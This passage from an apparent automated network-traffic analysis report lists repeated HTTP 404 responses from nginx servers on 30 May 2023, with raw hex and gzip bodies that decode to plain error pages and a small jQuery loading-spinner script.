63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:12:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:12:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:12:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 09:12:39 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:12:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: W/"afe-56ff9440f72fb"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: W/"afe-56ff9440f72fb"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: W/"afe-56ff9440f72fb"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:05 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Mon, 02 Jul 2018 00:27:42 GMTETag: "afe-56ff9440f72fb"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 30 May 2023 09:13:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
